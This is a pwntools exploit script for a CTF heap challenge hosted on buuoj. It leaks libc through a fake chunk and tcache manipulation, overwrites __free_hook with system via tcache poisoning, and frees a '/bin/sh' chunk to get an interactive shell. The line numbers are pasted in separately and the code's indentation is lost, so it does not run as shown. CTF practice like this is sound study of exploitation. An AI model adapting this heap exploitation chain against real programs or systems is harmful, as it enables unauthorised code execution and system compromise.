1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
|
from pwn import *
sh = remote('node3.buuoj.cn',29203)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']
fake_chunk = p64(0x0000000000602110) + p64(0x91)
fake_chunk += 'a'*0x80
fake_chunk += (p64(0) + p64(0x21) + 'a'*0x10)*2
sh.sendlineafter('name:',fake_chunk)
def add(size,content):
sh.sendlineafter('Choice:','1')
sh.sendlineafter('size:',str(size))
sh.sendafter('data:',content)
def edit(index,size,content):
sh.sendlineafter('Choice:','2')
sh.sendlineafter('index:',str(index))
sh.sendlineafter('size:',str(size))
sh.sendafter('data:',content)
def delete(index):
sh.sendlineafter('Choice:','3')
sh.sendlineafter('index:',str(index))
def show_name():
sh.sendlineafter('Choice:','4')
for i in range(7):
add(0x7F,'a'*0x10)
for i in range(7):
delete(i)
delete(20)
show_name()
sh.sendlineafter('edit:','Y')
sh.sendafter('name:','a'*0x10)
sh.recvuntil('a'*0x10)
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
show_name()
sh.sendlineafter('edit:','Y')
sh.sendafter('name:',p64(0) + p64(0x91))
add(0x20,'a'*0x20)
delete(0)
show_name()
sh.sendlineafter('edit:','Y')
sh.sendafter('name:',p64(0) + p64(0x31) + p64(free_hook_addr))
add(0x20,'/bin/sh\x00')
add(0x20,p64(system_addr))
delete(0)
sh.interactive()
|
